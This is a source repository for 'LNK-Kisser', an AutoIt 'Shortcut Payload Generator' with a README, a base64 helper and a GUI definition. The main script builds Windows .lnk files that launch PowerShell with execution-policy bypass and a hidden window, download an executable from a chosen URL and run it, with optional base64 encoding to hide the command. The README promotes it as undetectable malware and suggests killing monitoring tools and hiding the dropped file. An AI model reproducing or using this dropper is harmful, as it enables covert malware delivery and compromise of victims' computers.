├── screenshot_lnkkisser.bmp ├── screenshot_lnkkisser_tcpview.bmp ├── README.md ├── base64.au3 ├── LNK-Kisser.au3 └── GUI.kxf /screenshot_lnkkisser.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/9aylas/Shortcut-Payload-Generator/HEAD/screenshot_lnkkisser.bmp -------------------------------------------------------------------------------- /screenshot_lnkkisser_tcpview.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/9aylas/Shortcut-Payload-Generator/HEAD/screenshot_lnkkisser_tcpview.bmp -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shortcut-Payload-Generator 2 | - Exploiting PowerShell to make shortcut (.lnk) payloads [fud]. 3 | - There are plenty of awesome tricks out there, u can make it better ^_^. 4 | - For ex.: killing tcpview, taskmanager, etc. while downloading. 5 | - Set hidden attribs on the malware after downloading, etc. 6 | - G00d by3.
7 | - ./9aylas 8 | 9 | 10 | ![alt text](screenshot_lnkkisser.bmp "huh") 11 | ![alt text](screenshot_lnkkisser_tcpview.bmp "hah") 12 | 13 | >EOF 14 | -------------------------------------------------------------------------------- /base64.au3: -------------------------------------------------------------------------------- 1 | Func _Base64Decode($Data) 2 | Local $Opcode = "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| 4 | Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]") 5 | DllStructSetData($CodeBuffer, 1, $Opcode) 6 | 7 | Local $Ouput = DllStructCreate("byte[" & BinaryLen($Data) & "]") 8 | Local $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), _ 9 | "str", $Data, _ 10 | "ptr", DllStructGetPtr($Ouput), _ 11 | "int", 0, _ 12 | "int", 0) 13 | 14 | Return BinaryMid(DllStructGetData($Ouput, 1), 1, $Ret[0]) 15 | EndFunc 16 | 17 | Func _Base64Encode($Data, $LineBreak = 76) 18 | Local $Opcode = "0x5589E5FF7514535657E8410000004142434445464748494A4B4C4D4E4F505152535455565758595A6162636465666768696A6B6C6D6E6F707172737475767778797A303132333435363738392B2F005A8B5D088B7D108B4D0CE98F0000000FB633C1EE0201D68A06880731C083F901760C0FB6430125F0000000C1E8040FB63383E603C1E60409C601D68A0688470183F90176210FB6430225C0000000C1E8060FB6730183E60FC1E60209C601D68A06884702EB04C647023D83F90276100FB6730283E63F01D68A06884703EB04C647033D8D5B038D7F0483E903836DFC04750C8B45148945FC66B80D0A66AB85C90F8F69FFFFFFC607005F5E5BC9C21000" 19 | 20 | Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]") 21 | DllStructSetData($CodeBuffer, 1, $Opcode) 22 | 23 | $Data = Binary($Data) 24 | Local $Input = DllStructCreate("byte[" & BinaryLen($Data) & "]") 25 | DllStructSetData($Input, 1, $Data) 26 | 27 | $LineBreak = Floor($LineBreak / 4) * 4 28 | Local $OputputSize = Ceiling(BinaryLen($Data) * 4 / 3) 29 | $OputputSize = $OputputSize + Ceiling($OputputSize / $LineBreak) * 2 + 4 30 | 31 | Local $Ouput = DllStructCreate("char[" & 
$OputputSize & "]") 32 | DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), _ 33 | "ptr", DllStructGetPtr($Input), _ 34 | "int", BinaryLen($Data), _ 35 | "ptr", DllStructGetPtr($Ouput), _ 36 | "uint", $LineBreak) 37 | Return DllStructGetData($Ouput, 1) 38 | EndFunc -------------------------------------------------------------------------------- /LNK-Kisser.au3: -------------------------------------------------------------------------------- 1 | #cs 2 | 3 | Author : 9aylas 4 | From : Algeria , 16200 Hell 5 | Home : n/a 6 | 7 | Greet's To : AX302 , Ghosty , Erreur404 , Ramel , DebaAkrem , TheBen_xD , Zahir , TheHappyBit , ReDwan , Bellal , H-F ... 8 | And DzCyberSec Members. 9 | 10 | PS/0x1 : Where? ( emplacement ) is not working , ( it installs automatically in %appdata% ) another time i will add this featur 11 | or u can do it ,don't be a tree --' . 12 | 13 | PS/0x2 : you can change the icon ( just go here : http://help4windows.com/windows_7_shell32_dll.shtml ) 14 | and put ur icon number here : FileCreateShortcut .... 
i choosed ( 154 ) 15 | 16 | #ce 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #Include "base64.au3" 26 | #Region # GUI # Form=C:\Users\ByLka\Desktop\Form1.kxf 27 | $MWAH = GUICreate("LNK-Kisser", 376, 152, 192, 114) 28 | $url = GUICtrlCreateInput("https://www.lucifer.gov/payloads/malware.exe", 80, 40, 281, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_CENTER)) 29 | GUICtrlSetColor(-1, 0xFF0000) 30 | $cum = GUICtrlCreateButton("Make it cum", 80, 120, 281, 21) 31 | GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif") 32 | $L0 = GUICtrlCreateLabel("Payload URL:", 8, 44, 70, 17) 33 | GUICtrlSetColor(-1, 0x000080) 34 | 35 | $location = GUICtrlCreateCombo("WHERE ?", 216, 64, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL,$CBS_OEMCONVERT)) 36 | 37 | GUICtrlSetData(-1, "APPDATA|TEMP|WINDOWS") 38 | GUICtrlSetFont(-1, 8, 400, 0, "Courier") 39 | GUICtrlSetColor(-1, 0xFF0000) 40 | $L4 = GUICtrlCreateLabel("Shortcut Payload Generator ", 80, 8, 285, 27) 41 | GUICtrlSetFont(-1, 14, 800, 0, "Century") 42 | GUICtrlSetColor(-1, 0x808080) 43 | 44 | $encoded = GUICtrlCreateRadio("Encoded Command", 232, 96, 121, 17) 45 | GUICtrlSetState(-1, $GUI_CHECKED) 46 | $notcoded = GUICtrlCreateRadio("Not Encoded", 80, 96, 81, 17) 47 | 48 | $hihihihihi = GUICtrlCreateIcon("C:\Windows\System32\shell32.dll", -123, 24, 8, 32, 32) 49 | $exename = GUICtrlCreateInput("anything.exe", 80, 64, 113, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_CENTER)) 50 | GUICtrlSetColor(-1, 0xFF0000) 51 | $L3 = GUICtrlCreateLabel("Exe Name :", 8, 68, 62, 17) 52 | GUICtrlSetColor(-1, 0x000080) 53 | $L2 = GUICtrlCreateLabel("Payload Enc:", 8, 96, 67, 17) 54 | GUICtrlSetColor(-1, 0x000080) 55 | $aboutme = GUICtrlCreateButton("About ?", 8, 120, 65, 21) 56 | $L1 = GUICtrlCreateLabel("(Base64)", 176, 96, 46, 17) 57 | GUICtrlSetState(-1, $GUI_DISABLE) 58 | GUISetState(@SW_SHOW) 59 | 60 | While 1 61 | $nMsg = GUIGetMsg() 62 | Switch $nMsg 63 | Case $GUI_EVENT_CLOSE 64 | Exit 65 | 66 | case 
$cum 67 | doit() 68 | case $aboutme 69 | MsgBox(0,"About ?"," * LNK-Kisser is a Powershell Payload Generator *" & @CRLF & @CRLF & "Make your exe file hidden into shitty Shourtcut.lnk" &@crlf& "Automatically ready for a silent execution." &@crlf& "Plus Bypassing (Administrator Rights)." &@crlf& "Hidden while the process." &@crlf& ""&@crlf& "#E0F") 70 | 71 | EndSwitch 72 | WEnd 73 | 74 | 75 | 76 | func doit() 77 | 78 | if GUICtrlRead($encoded) = $GUI_CHECKED Then 79 | 80 | $payx = "payload_encoded" 81 | $x0x3d= "(New-Object System.Net.WebClient).DownloadFile('" &GUICtrlRead($url)& "','" &GUICtrlRead($exename)&" '); Start-Process '" &GUICtrlRead($exename)& "'" 82 | ;$x0x3d="(New-Object System.Net.WebClient).DownloadFile('" &GUICtrlRead($url)& "','%APPDATA%\" &GUICtrlRead($exename)& "'); cmd /c '%APPDATA%\" &GUICtrlRead($exename)& "'" 83 | $b0xit = _Base64Encode( StringToBinary ($x0x3d,$SB_UTF16LE)) 84 | 85 | FileCreateShortcut("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",""&$payx& ".lnk","","-NoP -NonI -Exec Bypass -W Hidden -ExecutionPolicy bypass -noprofile -EncodedCommand " & $b0xit ,"","c:\windows\system32\shell32.dll","","154") 86 | IF @ERROR then 87 | msgbox(16,"Error",@error) 88 | Else 89 | MsgBox(0,"Settings"," Host : " &GUICtrlRead($url) & @crlf& " Malware Name : " &GUICtrlRead($exename) & @CRLF& " Payload here : " &@ScriptDir&"\" &$payx& ".lnk") 90 | MsgBox(0,'','Success, Your LNK Payload is ready ') 91 | EndIf 92 | 93 | Else 94 | If GUICtrlRead($notcoded) = $GUI_CHECKED Then 95 | $pay = "payload" 96 | FileCreateShortcut("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ""&$pay& ".lnk","","-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('" &GUICtrlRead($url)& "','%APPDATA%\" &GUICtrlRead($exename)& "'); cmd /c '%APPDATA%\" &GUICtrlRead($exename)& "'","","c:\windows\system32\shell32.dll","","154") 97 | if @error Then 98 | msgbox(16,"Error",@error) 99 | Else 100 | 
MsgBox(0,"Settings"," Host : " &GUICtrlRead($url) & @crlf& " Malware Name : " &GUICtrlRead($exename) & @CRLF& " Payload here : " &@ScriptDir&"\" &$pay& ".lnk") 101 | MsgBox(0,'','Success , Your LNK Payload is ready ') 102 | EndIf 103 | 104 | EndIf 105 | EndIf 106 | 107 | EndFunc 108 | -------------------------------------------------------------------------------- /GUI.kxf: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 192 5 | 114 6 | 383 7 | 178 8 | LNK-Kisser 9 | clBtnFace 10 | DEFAULT_CHARSET 11 | clWindowText 12 | -11 13 | MS Sans Serif 14 | 15 | False 16 | True 17 | -1798701056 18 | 256 19 | 1.04 20 | False 21 | False 22 | False 23 | False 24 | 0 25 | 1 26 | 0 27 | 0 28 | 29 | 96 30 | 13 31 | 32 | 33 | 34 | 35 | 80 36 | 40 37 | 281 38 | 21 39 | DEFAULT_CHARSET 40 | clRed 41 | -11 42 | MS Sans Serif 43 | 44 | False 45 | 0 46 | http://www.lucifer.gov/payloads/malware.exe 47 | 1342374017 48 | 512 49 | DockHeight 50 | 51 | 52 | 53 | 54 | 55 | 80 56 | 120 57 | 281 58 | 21 59 | Make it cum 60 | DEFAULT_CHARSET 61 | clWindowText 62 | -11 63 | MS Sans Serif 64 | fsBold 65 | False 66 | 1 67 | clBtnFace 68 | 1342373888 69 | 0 70 | DockWidth, DockHeight 71 | 72 | 73 | 74 | 75 | 76 | 8 77 | 44 78 | 70 79 | 17 80 | Payload URL: 81 | DEFAULT_CHARSET 82 | clNavy 83 | -11 84 | MS Sans Serif 85 | 86 | False 87 | 2 88 | False 89 | 1342308608 90 | 0 91 | 92 | 93 | 94 | 95 | 96 | 97 | 216 98 | 64 99 | 145 100 | 25 101 | ANSI_CHARSET 102 | clRed 103 | -11 104 | Courier 105 | 106 | 13 107 | False 108 | 3 109 | WHERE ? 110 | 111 | 112 |
  • APPDATA
  • 113 |
  • TEMP
  • 114 |
  • WINDOWS
  • 115 |
    116 |
    117 | 1342374594 118 | 0 119 | DockHeight 120 |
    121 | 122 |
    123 | 124 | 125 | 80 126 | 8 127 | 285 128 | 27 129 | Shortcut Payload Generator 130 | ANSI_CHARSET 131 | clGray 132 | -19 133 | Century 134 | fsBold 135 | False 136 | 4 137 | False 138 | 1342308608 139 | 0 140 | 141 | 142 | 143 | 144 | 145 | 146 | 232 147 | 96 148 | 121 149 | 17 150 | Encoded Command 151 | True 152 | 5 153 | True 154 | 1342242825 155 | 0 156 | DockHeight 157 | 158 | 159 | 160 | 161 | 162 | 80 163 | 96 164 | 81 165 | 17 166 | Not Encoded 167 | 6 168 | 1342242825 169 | 0 170 | DockHeight 171 | 172 | 173 | 174 | 175 | 176 | 24 177 | 8 178 | 32 179 | 32 180 | 1342374147 181 | 0 182 | C:\Windows\System32\shell32.dll 183 | 122 184 | DockWidth, DockHeight 185 | 7 186 | 187 | 188 | 189 | 190 | 191 | 80 192 | 64 193 | 113 194 | 21 195 | DEFAULT_CHARSET 196 | clRed 197 | -11 198 | MS Sans Serif 199 | 200 | False 201 | 8 202 | anything.exe 203 | 1342374017 204 | 512 205 | DockHeight 206 | 207 | 208 | 209 | 210 | 211 | 8 212 | 68 213 | 62 214 | 17 215 | Exe Name: 216 | DEFAULT_CHARSET 217 | clNavy 218 | -11 219 | MS Sans Serif 220 | 221 | False 222 | 9 223 | False 224 | 1342308608 225 | 0 226 | 227 | 228 | 229 | 230 | 231 | 232 | 8 233 | 96 234 | 67 235 | 17 236 | Payload Enc: 237 | DEFAULT_CHARSET 238 | clNavy 239 | -11 240 | MS Sans Serif 241 | 242 | False 243 | 10 244 | False 245 | 1342308608 246 | 0 247 | 248 | 249 | 250 | 251 | 252 | 253 | 8 254 | 120 255 | 65 256 | 21 257 | About ? 258 | 11 259 | clBtnFace 260 | 1342373888 261 | 0 262 | DockWidth, DockHeight 263 | 264 | 265 | 266 | 267 | 268 | 176 269 | 96 270 | 46 271 | 17 272 | (Base64) 273 | False 274 | 12 275 | False 276 | 1342308608 277 | 0 278 | 279 | 280 | 281 | 282 |
    283 |
    --------------------------------------------------------------------------------